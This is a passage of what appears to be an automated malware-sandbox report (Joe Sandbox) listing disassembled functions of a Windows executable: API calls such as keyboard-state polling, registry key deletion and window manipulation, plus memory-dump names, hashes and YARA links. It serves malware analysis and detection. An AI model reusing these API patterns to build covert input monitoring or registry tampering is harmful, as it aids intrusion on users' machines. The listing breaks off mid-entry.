                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                                                                                                                                                                                                                    • String ID: ThumbnailClass
                                                                                                                                                                                                                                                                                                    • API String ID: 1311036022-1241985126
                                                                                                                                                                                                                                                                                                    • Opcode ID: 086297651383e50c5c3146eeca752a46ab094e2001ce0263bc44fd473760adfb
                                                                                                                                                                                                                                                                                                    • Instruction ID: ee99fbe01ca6cefa787a6ff05e0a9436b53e8500a386ac0eab6b4639084f644d
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 086297651383e50c5c3146eeca752a46ab094e2001ce0263bc44fd473760adfb
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0291E572104B06AFD709EF24D884BAAB7E9FF01348F005519FA9EA2091EF31ED55CB91
                                                                                                                                                                                                                                                                                                    Function 00E8C8F7 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(00EF29C0,000000FF,00000000,00000030), ref: 00E8C973
                                                                                                                                                                                                                                                                                                    • SetMenuItemInfoW.USER32(00EF29C0,00000004,00000000,00000030), ref: 00E8C9A8
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 00E8C9BA
                                                                                                                                                                                                                                                                                                    • GetMenuItemCount.USER32(?), ref: 00E8CA00
                                                                                                                                                                                                                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 00E8CA1D
                                                                                                                                                                                                                                                                                                    • GetMenuItemID.USER32(?,-00000001), ref: 00E8CA49
                                                                                                                                                                                                                                                                                                    • GetMenuItemID.USER32(?,?), ref: 00E8CA90
                                                                                                                                                                                                                                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E8CAD6
                                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E8CAEB
                                                                                                                                                                                                                                                                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E8CB0C
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                                                                                                                    • API String ID: 1460738036-4108050209
                                                                                                                                                                                                                                                                                                    • Opcode ID: 833b36a3ce4c15939186a0af3c38b9f51b95ae9f18c992249456d0a97ffa20f2
                                                                                                                                                                                                                                                                                                    • Instruction ID: b1b0b6b39c51987874811b05c30890beadf33f4a5ca0c162c5f478b6f3c8ea6c
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 833b36a3ce4c15939186a0af3c38b9f51b95ae9f18c992249456d0a97ffa20f2
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F3618D7090024AAFDB15EF64DC89AEE7BA8EB06348F241555E95EB3151D730AD04CB71
                                                                                                                                                                                                                                                                                                    Function 00E8E4C2 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00E8E4D4
                                                                                                                                                                                                                                                                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00E8E4FA
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E8E504
                                                                                                                                                                                                                                                                                                    • _wcsstr.LIBVCRUNTIME ref: 00E8E554
                                                                                                                                                                                                                                                                                                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00E8E570
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                                                                                                                                                                                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                                                                                                                                                    • API String ID: 1939486746-1459072770
                                                                                                                                                                                                                                                                                                    • Opcode ID: eb3eb2878a4beb11d2dec1d3e0c91099def973b47ccf541586d9e23c329c354c
                                                                                                                                                                                                                                                                                                    • Instruction ID: 3a1d760b86e2d661b02cf071a6042b36ef0f38b8038a6ea08a1aa96d31b378aa
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb3eb2878a4beb11d2dec1d3e0c91099def973b47ccf541586d9e23c329c354c
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50412672A043187BEB01BB65AC47EFF77ACDF55720F102065F908B6282FB749A0197A5
                                                                                                                                                                                                                                                                                                    Function 00EAD694 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00EAD6C4
                                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00EAD6ED
                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00EAD7A8
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EAD694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00EAD70A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EAD694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00EAD71D
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EAD694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00EAD72F
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EAD694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00EAD765
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EAD694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00EAD788
                                                                                                                                                                                                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00EAD753
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                                                                                                                                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                                                    • API String ID: 2734957052-4033151799
                                                                                                                                                                                                                                                                                                    • Opcode ID: 3b59962a343f15f63caf86a771098cce058554fe79071b1448f0d4dbc81ea330
                                                                                                                                                                                                                                                                                                    • Instruction ID: 291fc0f06e49d64f24dcd9e026ccb73f6748873e4b02f53c72d091aa26bb83d5
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b59962a343f15f63caf86a771098cce058554fe79071b1448f0d4dbc81ea330
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 06318175905129BFD7259B51DC88EFFBB7CEF4A714F000166F806F6110EB34AE499AA0
                                                                                                                                                                                                                                                                                                    Function 00E8EFC7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • timeGetTime.WINMM ref: 00E8EFCB
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E3F215: timeGetTime.WINMM(?,?,00E8EFEB), ref: 00E3F219
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 00E8EFF8
                                                                                                                                                                                                                                                                                                    • EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 00E8F01C
                                                                                                                                                                                                                                                                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00E8F03E
                                                                                                                                                                                                                                                                                                    • SetActiveWindow.USER32 ref: 00E8F05D
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00E8F06B
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00E8F08A
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000000FA), ref: 00E8F095
                                                                                                                                                                                                                                                                                                    • IsWindow.USER32 ref: 00E8F0A1
                                                                                                                                                                                                                                                                                                    • EndDialog.USER32(00000000), ref: 00E8F0B2
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                                                                                                                                                    • String ID: BUTTON
                                                                                                                                                                                                                                                                                                    • API String ID: 1194449130-3405671355
                                                                                                                                                                                                                                                                                                    • Opcode ID: 1e2946f22960e52b8bb3930393c478d53cd2bddcdeea599d134ea9847a1328af
                                                                                                                                                                                                                                                                                                    • Instruction ID: 2fb053bdb808b6a1031b623bac65730bd7f156394696c1597af36866212b9611
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1e2946f22960e52b8bb3930393c478d53cd2bddcdeea599d134ea9847a1328af
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AF21B0B5204205BFE3117F32EC89A677BAAE785748B006025F50DF2272EB714C08DB51
                                                                                                                                                                                                                                                                                                    Function 00E8F313 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2B329: _wcslen.LIBCMT ref: 00E2B333
                                                                                                                                                                                                                                                                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00E8F374
                                                                                                                                                                                                                                                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00E8F38A
                                                                                                                                                                                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E8F39B
                                                                                                                                                                                                                                                                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00E8F3AD
                                                                                                                                                                                                                                                                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00E8F3BE
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: SendString$_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                                                                                                                                                    • API String ID: 2420728520-1007645807
                                                                                                                                                                                                                                                                                                    • Opcode ID: f0f922501958b38cf1fc2613d25e8ccf94cd53f0693c4e7e4fa0a29e6ad9aa0b
                                                                                                                                                                                                                                                                                                    • Instruction ID: 0e48287eb359d85c9e6a289f9c88e8d152f8252789a345eac48a248d99eff6f1
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f0f922501958b38cf1fc2613d25e8ccf94cd53f0693c4e7e4fa0a29e6ad9aa0b
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE119131A902AD79D720B2669C4AEFF6ABCEFD1B00F402439B405F20D1EAA15945C6A1
                                                                                                                                                                                                                                                                                                    Function 00E52FF3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E53007
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E52D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00E5DB51,00EF1DC4,00000000,00EF1DC4,00000000,?,00E5DB78,00EF1DC4,00000007,00EF1DC4,?,00E5DF75,00EF1DC4), ref: 00E52D4E
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E52D38: GetLastError.KERNEL32(00EF1DC4,?,00E5DB51,00EF1DC4,00000000,00EF1DC4,00000000,?,00E5DB78,00EF1DC4,00000007,00EF1DC4,?,00E5DF75,00EF1DC4,00EF1DC4), ref: 00E52D60
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E53013
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E5301E
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E53029
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E53034
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E5303F
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E5304A
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E53055
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E53060
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E5306E
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                    • String ID: &
                                                                                                                                                                                                                                                                                                    • API String ID: 776569668-2586148540
                                                                                                                                                                                                                                                                                                    • Opcode ID: 163ab2e63a9f3239433c4e3101204d89e2a915a6238aa68bd3855b4489d01c9e
                                                                                                                                                                                                                                                                                                    • Instruction ID: 80cb313e65b0101146c7153ce60e9458e2cb76c18382417074d66ec89f502e72
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 163ab2e63a9f3239433c4e3101204d89e2a915a6238aa68bd3855b4489d01c9e
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B11B976100108BFCB01EF54C842DDD3BB5EF16351F8198A9FE08AF222DA32DE559B50
                                                                                                                                                                                                                                                                                                    Function 00E8A958 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetKeyboardState.USER32(?), ref: 00E8A9D9
                                                                                                                                                                                                                                                                                                    • SetKeyboardState.USER32(?), ref: 00E8AA44
                                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00E8AA64
                                                                                                                                                                                                                                                                                                    • GetKeyState.USER32(000000A0), ref: 00E8AA7B
                                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00E8AAAA
                                                                                                                                                                                                                                                                                                    • GetKeyState.USER32(000000A1), ref: 00E8AABB
                                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00E8AAE7
                                                                                                                                                                                                                                                                                                    • GetKeyState.USER32(00000011), ref: 00E8AAF5
                                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 00E8AB1E
                                                                                                                                                                                                                                                                                                    • GetKeyState.USER32(00000012), ref: 00E8AB2C
                                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00E8AB55
                                                                                                                                                                                                                                                                                                    • GetKeyState.USER32(0000005B), ref: 00E8AB63
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 541375521-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 475febcf89c415f20d7a20f9cd2e6883e6c28a9ddd2774bd41b344e141538144
                                                                                                                                                                                                                                                                                                    • Instruction ID: bc66bbdf185b042765c361084da3f83980bccf26f3a06e8b74bdb8801729bf88
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 475febcf89c415f20d7a20f9cd2e6883e6c28a9ddd2774bd41b344e141538144
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6751D76090878429FB35F7609850BEAAFF55F41344F0C65ABC5CE365C2DA549B4CC763
                                                                                                                                                                                                                                                                                                    Function 00E8662D Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 00E86649
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00E86662
                                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00E866C0
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 00E866D0
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00E866E2
                                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00E86736
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00E86744
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00E86756
                                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00E86798
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00E867AB
                                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00E867C1
                                                                                                                                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00E867CE
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3096461208-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 234d5b795672a7e6f84de2f8fb91bc7fd591ff7873aa1b7c111e27ec78f79049
                                                                                                                                                                                                                                                                                                    • Instruction ID: 06ad147872fd02749538cde7eca4e1433696289937caed1ce0fafec8ed96baab
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 234d5b795672a7e6f84de2f8fb91bc7fd591ff7873aa1b7c111e27ec78f79049
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 84513070A00219AFDF18DF69DD85AAEBBB5FB48314F108229F519F7294E7709D04CB50
                                                                                                                                                                                                                                                                                                    Function 00E22128 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E22234: GetWindowLongW.USER32(?,000000EB), ref: 00E22242
                                                                                                                                                                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00E22152
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
